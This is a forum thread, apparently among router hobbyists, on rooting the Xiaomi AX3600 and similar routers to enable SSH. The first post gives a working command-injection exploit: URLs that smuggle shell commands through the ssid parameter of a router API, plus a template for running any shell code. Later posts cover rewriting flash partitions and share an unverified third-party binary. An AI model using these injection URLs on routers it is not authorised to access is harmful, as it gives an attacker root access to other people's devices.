Xiaomi ax3600 ssh guide

Half a year has passed since the release of the xiaomi wifi6 router ax3600. And finally we can get the ssh access on it.
The origin exploit is found by LonGDikE from Chinese Enshan forum.
Here are the steps:

  1. Downgrade your router to 1.0.17 version:http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r3600/miwifi_r3600_firmware_5da25_1.0.17.bin
  2. Login in to your router and get the STOK like follwing:
    http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/web/home#router
  3. Access these urls in browser:

(nvram set ssh_en=1;nvram commit)
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit%3B

(sed -i 's/channel=.*/channel="debug"/g' /etc/init.d/dropbear)
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bsed%20-i%20's/channel=.*/channel=%5C%22debug%5C%22/g'%20/etc/init.d/dropbear%3B

(/etc/init.d/dropbear start)
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B/etc/init.d/dropbear%20start%3B

  1. If everything is ok ,the ssh is enabled now.

PS: You can excute any shell code like this:
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B<your encoded shell code>%3B

8 Likes

Did your Redmi AX5 have version 1.0.16 installed when you received it or did you downgrade?

I'm wondering how to find the download links for previous versions for the Mi AX1800.

Yes recieved with 1.0.16 in ax5.

If find something for AX1800 i talk to you

1 Like

I think I need to downgrade to 1.0.34, the link is available on right.com.cn forum but I'm not a member, maybe someone with access could post it here.

Edit: No need to downgrade, gained SSH access to the Mi AX1800 running latest 1.0.336 firmware after a reset and setup in router mode, in AP mode is didn't work.

I also have the AX5 and would love to load OpenWrt on it. Is there anything I can do to assist?

Looks like SSH can be permanent but I'm having trouble with the chinese forum... if someone could translate all the steps here, please...

"AX3600 permanently open telnet-ssh, you can upgrade and restore at will"
https://www.right.com.cn/forum/thread-4045295-1-1.html

edit: I managed to translate the post, but I can't get the attachment :frowning:

Step 1: Back up Xiaomi's bdata partition, which contains the router's sn code ssh and other information. Before operation, confirm the partition details of the router:

root@XiaoQiang:~# cat /proc/mtd | grep bdata

mtd9: 00080000 00020000 "bdata"

You can see that my bdata partition is mtd9. Then enter the following command:

nanddump -f /tmp/bdata_mtd9.img /dev/mtd9

After the backup is complete, copy the bdata_mtd9.img file to the computer in the /tmp directory. You can use the winscp software to copy directly, or use the scp command to copy
After the copy is completed, for safety reasons, I suggest to make another copy and save it, just in case

I don't understand how just backing up the partition can make ssh permanent. How to restore the partition (and enable ssh) if you no longer have access to ssh?

1 Like

You actually need a file, which will hack and unlock mtd to gain access of telnet permanent, and start ssh service via command after. I got the file, but dunno how to upload here

You can upload it anywhere (like gofile) and send the link here
https://gofile.io/welcome

https://gofile.io/d/Lb8nKH

Can you tell from where you got the binary file and if there is any version for the Redmi AX5 and Xiaomi AX1800?

What am I supposed to do with that file after performing mtd9 backup?

Hi,

Worked on Redmi AX5 with 1.0.26 firmware.

Thanks

1 Like

Does anybody came across following problem?

root@ax3600:~# mtd write /tmp/bdata_mtd9.img bdata
Could not open mtd device: bdata
Can't open device for writing!

I do follow procedure description but all the time getting the above.

mtd partitions are usually read only.

That I understand however hack from this forum: https://www.right.com.cn/forum/thread-4045295-1-1.html contains flashing crash partition with the file that is supposed to allow writing to mtd9 after reboot. Unfortunately that seem not to work for me and I an wondering what the reason might be.

There is a good description here, how to get a permanent ssh after firmware upgrade:
https://www.5v13.com/mesh/26276.html#

However I also stuck, with write back step.

root@XiaoQiang:~# mtd write /tmp/bdata_mtd9.img bdata
Could not open mtd device: bdata
Can't open device for writing!

There is anyone figured out how to solve it?

The crash_unlock.img is written sucessfuljy, at least seems to it.

root@XiaoQiang:~# mtd write /tmp/crash_unlock.img crash
Unlocking crash ...

Writing from /tmp/crash_unlock.img to crash ...
root@XiaoQiang:~#

You normally need to install the kmod-mtd-rw package to be able to write mtd partitions.

1 Like

Yeah, actually the crash_unlock.img file supposed to get the mtd partitions writeable.
I also tried the way as kmod-mtd-rw package wasn not available at all at https://downloads.openwrt.org/snapshots/packages/aarch64_cortex-a53/packages/
I got this
https://mgmt.saar.freifunk.net/openwrt/releases/18.06.8/targets/mvebu/cortexa53/kmods/4.14.171-1-e2d32c880dc65b62ec0410e12611f89c/kmod-mtd-rw_4.14.171+git-20160214-1_aarch64_cortex-a53.ipk
then copy to the router /tmp folder, then install to the memory

root@XiaoQiang:~# opkg install --nodeps --dest ram /tmp/kmod-mtd-rw_4.14.171+git
-20160214-1_aarch64_cortex-a53.ipk
Installing kmod-mtd-rw (4.14.171+git-20160214-1) to ram...
Configuring kmod-mtd-rw.
root@XiaoQiang:~# insmod mtd-rw i_want_a_brick=1
Failed to find mtd-rw. Maybe it is a built in module ?

But still no luck! :frowning:

1 Like

Kernel modules must match the running kernel exactly (not just the same upstream version, but also the same patches and configuration), there is only very little leeway. Non-matching kernel versions usually just result in the module not being considered, same version but non-matching patches/ config likely causes crashes.

In order to match, you'd need the 4.4.60 based OEM kernel, but you don't have its source.